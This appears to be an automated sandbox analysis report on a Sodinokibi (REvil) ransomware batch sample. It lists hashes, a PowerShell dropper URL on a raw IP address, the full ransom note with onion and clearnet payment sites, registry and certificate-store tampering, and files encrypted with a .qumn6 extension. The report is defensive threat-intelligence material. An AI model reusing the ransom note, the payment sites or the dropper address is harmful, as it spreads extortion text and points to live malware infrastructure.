sodinokibi | 02a0406ce3e4a1076e67011128e0f0ea53e4c1ab7826a25e0215c8418960563e

General

Target

0cc92ed976f20bbf302be1a39d209cfb.bat
Size

215B
MD5

5a017babe92c5caf427346c46b48b015
SHA1

2958eaeeb470d273b70d1528c0e78b33de585b8c
SHA256

02a0406ce3e4a1076e67011128e0f0ea53e4c1ab7826a25e0215c8418960563e
SHA512

8406dd4b30b5f549321ee69c640c3ddb93cdf3213075ddd8f283698129b39a1ae09e08cceea0a508aaa2a600b96f7e491331edd63e8f2309563bebc386ef6ece

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/0cc92ed976f20bbf302be1a39d209cfb

Extracted

Path

C:\qumn6-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension qumn6. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FD8962F599EA2046 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/FD8962F599EA2046 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: xHJUo+qAJpQVJdmUMdWhJkZ0ayBDRhQEm/mf0FaNz8hbNloRyo1nGMfXhTikIl8D QAxOKoazUd4j5fpo9VBS48mJwHqc2xbV6j/MVpPIfuUi9ddiVri+4NPMPIH9IVKF Iwl0PI4j7Ny3wkVzDJfRTquMKUCwQogjXKWnp9xqYLfeaijPAu4h2Yap8I+4K7A1 zz5ckJf+15HHVQdrvqbX+ziETsxJPPToIK1ZMN6g5l5N7lKF7W9Kr96QvHQbwYm4 myS/X3kPnB3SjrVvJaKChiHWl4xZLE8ojTx8LaywCK7kCAbUjl3WVVO+ZkIYIHhq ABE/yfwvb1q2H3ay3dEkrmRkkjKxWf+vuU5iKxufJT2CNc0y8AZScXva/i+/4mvC IRp2RgX/cO6XxNBgm22ruxSqUF1rEJuOXsxPI/t4iBhlIO9QhViaXR2FUmGMaOsC oBv4Kb0I0e3ejTxsrOO3/jZ/RJ5zwS72Ln2F7nn4vpAlyKS0jilHkxAWHFDxOD3J y57f4b3J/b7258fBhpKI7mCNdtP7XYVepOUwbYQOmv0uFmRLHH0VXhWzl1Vj/WiR oAW4zW9ZLYk7rk0rxAukWkv+cGg1zxsp3SGReAB1yaCKEO30NmuarZ12tT4q0vbD quDQymxPGYffkoA4Js1RtHbN23vofHnPUsCDJO25c+84fZejwzflkYNYkHzp8hmx f4+/yLEoXytZB0u4DPyTL0MuUkKLytOhkB1UpoYMyKCPqjXbxhevzQit9z+eW/1F ouCr76A2Q2d1KX4p6Mg4JdQCNkwnBrJZFgEMFuk3Fc7wxT/FHLJWiW3x9VeS4Ex6 ywshbc7QXRO9/rlstCm118YOJOIhIKFiE7Y0mfRVLLeRBHb/oKFx6OH6IEoAAHt5 0EwYgfwu4f/p1RTNosiNg11fuiRl55sycmZf3GX4f4mGOLhK7fsG1giX8kzNmc/B jac2SNow+cCYR2qN45dk5/JUp3qcEbpk7QKV4k5H6AZYhzQw2Nq3IrzNNPf2Z4y9 8/IPoohapZnHOyeliLn7DXyEOE/eBhSHUCMIGieSH/6Lrw+qUHCK3R043TKGNXNW fvbzJBl8vkNMV5Z1cGaEwthHlLpGzJsaeUgUVEE9jMmnkybTOKEnwT6wwuXXoVBi 2XM6VZYlA8VCFGt1lEFrgaLwNaWHUKZqa6qs9xju+ZKbKosAIFzLyLXITBdgIhOX Zz8zVE51JS7twC4nLlcoq4FJs8FE4RvYATfp3yzEqaPFr88xeTcAm7smcxYmQUcr 41r1vOqG8rVZVN057wwG00+4GQ23MACo6yZ4Ffyo ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FD8962F599EA2046

http://decryptor.cc/FD8962F599EA2046

Signatures

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e650190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000002000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe

Drops file in Program Files directory 28 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\LimitApprove.vbe	powershell.exe
File opened for modification	\??\c:\program files\SendConvertTo.wm	powershell.exe
File created	\??\c:\program files\qumn6-readme.txt	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\qumn6-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\UnblockTrace.jpe	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\qumn6-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\InitializeClear.mp4	powershell.exe
File opened for modification	\??\c:\program files\PopUse.xps	powershell.exe
File opened for modification	\??\c:\program files\SaveWrite.ppsx	powershell.exe
File opened for modification	\??\c:\program files\CompareRename.jpeg	powershell.exe
File opened for modification	\??\c:\program files\OpenMerge.xla	powershell.exe
File opened for modification	\??\c:\program files\StepWatch.crw	powershell.exe
File opened for modification	\??\c:\program files\UndoRemove.rm	powershell.exe
File opened for modification	\??\c:\program files\CompressJoin.DVR-MS	powershell.exe
File opened for modification	\??\c:\program files\ConvertToStep.docm	powershell.exe
File opened for modification	\??\c:\program files\MergeConnect.asp	powershell.exe
File opened for modification	\??\c:\program files\SyncLock.m4v	powershell.exe
File opened for modification	\??\c:\program files\UnlockReset.emf	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\qumn6-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\CopyEdit.mpg	powershell.exe
File opened for modification	\??\c:\program files\ReadEdit.easmx	powershell.exe
File opened for modification	\??\c:\program files\ShowDisconnect.midi	powershell.exe
File opened for modification	\??\c:\program files\StepOpen.xps	powershell.exe
File opened for modification	\??\c:\program files\SyncPing.ttc	powershell.exe
File opened for modification	\??\c:\program files\LockProtect.xml	powershell.exe
File opened for modification	\??\c:\program files\RegisterApprove.asp	powershell.exe
File created	\??\c:\program files (x86)\qumn6-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ConvertToSelect.mp3	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 316 wrote to memory of 1440	316	cmd.exe	powershell.exe
PID 316 wrote to memory of 1440	316	cmd.exe	powershell.exe
PID 316 wrote to memory of 1440	316	cmd.exe	powershell.exe
PID 316 wrote to memory of 1440	316	cmd.exe	powershell.exe
PID 1440 wrote to memory of 1844	1440	powershell.exe	powershell.exe
PID 1440 wrote to memory of 1844	1440	powershell.exe	powershell.exe
PID 1440 wrote to memory of 1844	1440	powershell.exe	powershell.exe
PID 1440 wrote to memory of 1844	1440	powershell.exe	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

1440 powershell.exe

pid	process
1440	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9i54al32.bmp"	powershell.exe

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\CompressGet.tif => \??\c:\users\admin\pictures\CompressGet.tif.qumn6	powershell.exe
File renamed	C:\Users\Admin\Pictures\RedoApprove.raw => \??\c:\users\admin\pictures\RedoApprove.raw.qumn6	powershell.exe
File renamed	C:\Users\Admin\Pictures\TestResume.tif => \??\c:\users\admin\pictures\TestResume.tif.qumn6	powershell.exe
File renamed	C:\Users\Admin\Pictures\UninstallSave.png => \??\c:\users\admin\pictures\UninstallSave.png.qumn6	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\GrantRestore.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\DebugConvertFrom.tif => \??\c:\users\admin\pictures\DebugConvertFrom.tif.qumn6	powershell.exe
File renamed	C:\Users\Admin\Pictures\DenyExit.png => \??\c:\users\admin\pictures\DenyExit.png.qumn6	powershell.exe
File renamed	C:\Users\Admin\Pictures\GrantRestore.tiff => \??\c:\users\admin\pictures\GrantRestore.tiff.qumn6	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeBackupPrivilege	1576	vssvc.exe
Token: SeRestorePrivilege	1576	vssvc.exe
Token: SeAuditPrivilege	1576	vssvc.exe
Token: SeTakeOwnershipPrivilege	1440	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

1440 powershell.exe
1440 powershell.exe
1440 powershell.exe
1844 powershell.exe
1844 powershell.exe

pid	process
1440	powershell.exe
1440	powershell.exe
1440	powershell.exe
1844	powershell.exe
1844	powershell.exe

Blacklisted process makes network request 182 IoCs

Processes:

powershell.exe

flow	pid	process
4	1440	powershell.exe
6	1440	powershell.exe
7	1440	powershell.exe
9	1440	powershell.exe
11	1440	powershell.exe
12	1440	powershell.exe
14	1440	powershell.exe
15	1440	powershell.exe
17	1440	powershell.exe
18	1440	powershell.exe
20	1440	powershell.exe
22	1440	powershell.exe
24	1440	powershell.exe
26	1440	powershell.exe
28	1440	powershell.exe
30	1440	powershell.exe
32	1440	powershell.exe
34	1440	powershell.exe
36	1440	powershell.exe
37	1440	powershell.exe
39	1440	powershell.exe
40	1440	powershell.exe
42	1440	powershell.exe
43	1440	powershell.exe
44	1440	powershell.exe
46	1440	powershell.exe
48	1440	powershell.exe
50	1440	powershell.exe
52	1440	powershell.exe
54	1440	powershell.exe
55	1440	powershell.exe
57	1440	powershell.exe
59	1440	powershell.exe
60	1440	powershell.exe
62	1440	powershell.exe
63	1440	powershell.exe
66	1440	powershell.exe
67	1440	powershell.exe
69	1440	powershell.exe
70	1440	powershell.exe
72	1440	powershell.exe
74	1440	powershell.exe
75	1440	powershell.exe
77	1440	powershell.exe
78	1440	powershell.exe
80	1440	powershell.exe
81	1440	powershell.exe
83	1440	powershell.exe
84	1440	powershell.exe
86	1440	powershell.exe
87	1440	powershell.exe
89	1440	powershell.exe
91	1440	powershell.exe
92	1440	powershell.exe
94	1440	powershell.exe
96	1440	powershell.exe
97	1440	powershell.exe
99	1440	powershell.exe
101	1440	powershell.exe
102	1440	powershell.exe
104	1440	powershell.exe
107	1440	powershell.exe
108	1440	powershell.exe
112	1440	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\0cc92ed976f20bbf302be1a39d209cfb.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
